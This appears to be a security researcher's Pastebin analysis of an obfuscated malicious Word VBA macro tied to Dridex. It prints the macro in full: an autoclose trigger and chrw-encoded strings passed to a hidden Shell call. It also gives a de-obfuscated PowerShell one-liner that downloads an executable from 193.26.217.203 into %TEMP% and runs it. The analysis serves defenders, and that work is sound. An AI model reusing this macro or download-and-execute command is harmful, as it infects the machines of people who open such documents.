API tools faq
paste
Advertisement
Neonprimetime

VBA Macro in Word Dridex 193.26.217.203

Neonprimetime
Mar 31st, 2015
508
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.23 KB | None | 0 0
raw download clone embed print report
  1. VBA Macro in Microsoft Word Dridex
  2. Reported by neonprimetime security
  3. http://neonprimetime.blogspot.com
  4.  
  5. *****
  6. blog about this post: http://neonprimetime.blogspot.com/2015/03/obfuscated-malicious-vba-macro.html
  7. *****
  8. Sub autoclose()
  9.  
  10. sdfsdfdsf
  11.  
  12. End Sub
  13. *****
  14. Sub sdfsdfdsf()
  15.  
  16. GVhkjbjv = chrw(49.5 + 49.5) & chrw(54.5 + 54.5) & chrw(50 + 50) & chrw(16 + 16) & chrw(23.5 + 23.5) & chrw(37.5 + 37.5) & chrw(16 + 16) & chrw(56 + 56) & chrw(55.5 + 55.5) & chrw(59.5 + 59.5) & chrw(50.5 + 50.5) & chrw(57 + 57) & chrw(57.5 + 57.5) & chrw(52 + 52) & chrw(50.5 + 50.5) & chrw(54 + 54) & chrw(54 + 54) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(16 + 16) & chrw(22.5 + 22.5) & chrw(34.5 + 34.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(49.5 + 49.5) & chrw(58.5 + 58.5) & chrw(58 + 58) & chrw(52.5 + 52.5) & chrw(55.5 + 55.5) & chrw(55 + 55) & chrw(40 + 40) & chrw(55.5 + 55.5) & chrw(54 + 54) & chrw(52.5 + 52.5) & chrw(49.5 + 49.5) & chrw(60.5 + 60.5) & chrw(16 + 16) & chrw(49 + 49) & chrw(60.5 + 60.5) & chrw(56 + 56) & chrw(48.5 + 48.5) & chrw(57.5 + 57.5) & chrw(57.5 + 57.5) & chrw(16 + 16)
  17.  
  18. GYUUYIiii = chrw(22.5 + 22.5) & chrw(55 + 55) & chrw(55.5 + 55.5) & chrw(56 + 56) & chrw(57 + 57) & chrw(55.5 + 55.5) & chrw(51 + 51) & chrw(52.5 + 52.5) & chrw(54 + 54) & chrw(50.5 + 50.5) & chrw(16 + 16) & chrw(20 + 20) & chrw(39 + 39) & chrw(50.5 + 50.5) & chrw(59.5 + 59.5) & chrw(22.5 + 22.5) & chrw(39.5 + 39.5) & chrw(49 + 49) & chrw(53 + 53) & chrw(50.5 + 50.5) & chrw(49.5 + 49.5) & chrw(58 + 58) & chrw(16 + 16) & chrw(41.5 + 41.5) & chrw(60.5 + 60.5) & chrw(57.5 + 57.5) & chrw(58 + 58) & chrw(50.5 + 50.5) & chrw(54.5 + 54.5) & chrw(23 + 23) & chrw(39 + 39) & chrw(50.5 + 50.5) & chrw(58 + 58) & chrw(23 + 23) & chrw(43.5 + 43.5) & chrw(50.5 + 50.5) & chrw(49 + 49) & chrw(33.5 + 33.5) & chrw(54 + 54) & chrw(52.5 + 52.5) & chrw(50.5 + 50.5) & chrw(55 + 55) & chrw(58 + 58) & chrw(20.5 + 20.5) & chrw(23 + 23)
  19.  
  20. hgFYyhhshu = chrw(34 + 34) & chrw(55.5 + 55.5) & chrw(59.5 + 59.5) & chrw(55 + 55) & chrw(54 + 54) & chrw(55.5 + 55.5) & chrw(48.5 + 48.5) & chrw(50 + 50) & chrw(35 + 35) & chrw(52.5 + 52.5) & chrw(54 + 54) & chrw(50.5 + 50.5) & chrw(20 + 20) & chrw(19.5 + 19.5) & chrw(52 + 52) & chrw(58 + 58) & chrw(58 + 58) & chrw(56 + 56) & chrw(29 + 29) & chrw(23.5 + 23.5) & chrw(23.5 + 23.5) & chrw(24.5 + 24.5) & chrw(28.5 + 28.5) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(25 + 25) & chrw(27 + 27) & chrw(23 + 23) & chrw(25 + 25) & chrw(24.5 + 24.5) & chrw(27.5 + 27.5) & chrw(23 + 23) & chrw(25 + 25) & chrw(24 + 24) & chrw(25.5 + 25.5) & chrw(23.5 + 23.5) & chrw(53 + 53) & chrw(57.5 + 57.5) & chrw(48.5 + 48.5) & chrw(60 + 60) & chrw(55.5 + 55.5) & chrw(28 + 28) & chrw(58.5 + 58.5) & chrw(23.5 + 23.5) & chrw(51.5 + 51.5) & chrw(25.5 + 25.5) & chrw(28.5 + 28.5) & chrw(49 + 49) & chrw(25 + 25) & chrw(49.5 + 49.5) & chrw(60 + 60) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(19.5 + 19.5)
  21.  
  22. GYiuudsuds = chrw(22 + 22) & chrw(19.5 + 19.5) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(49.5 + 49.5) & chrw(48.5 + 48.5) & chrw(49 + 49) & chrw(19.5 + 19.5) & chrw(20.5 + 20.5) & chrw(29.5 + 29.5) & chrw(16 + 16) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(56 + 56) & chrw(48.5 + 48.5) & chrw(55 + 55) & chrw(50 + 50) & chrw(16 + 16)
  23.  
  24. shdfihiof = chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(49.5 + 49.5) & chrw(48.5 + 48.5) & chrw(49 + 49) & chrw(16 + 16) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23)
  25.  
  26. doifhsoip = chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(29.5 + 29.5) & chrw(16 + 16) & chrw(57.5 + 57.5) & chrw(58 + 58) & chrw(48.5 + 48.5) & chrw(57 + 57) & chrw(58 + 58) & chrw(16 + 16) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(29.5 + 29.5)
  27.  
  28. JHGUgisdc = GVhkjbjv + GYUUYIiii + hgFYyhhshu + GYiuudsuds + shdfihiof + doifhsoip
  29.  
  30. IUGuyguisdf = Shell(JHGUgisdc, 0)
  31.  
  32. End Sub
  33. ***************************
  34. De-Obfuscated Code:
  35. ***************************
  36. Sub autoclose()
  37.  
  38. ExecuteMyMaliciousCode()
  39.  
  40. End Sub
  41. *****
  42. Sub ExecuteMyMaliciousCode()
  43.  
  44.  
  45. commandToRun = "cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.203/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;"
  46.  
  47. Shell(commandToRun)
  48.  
  49.  
  50. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!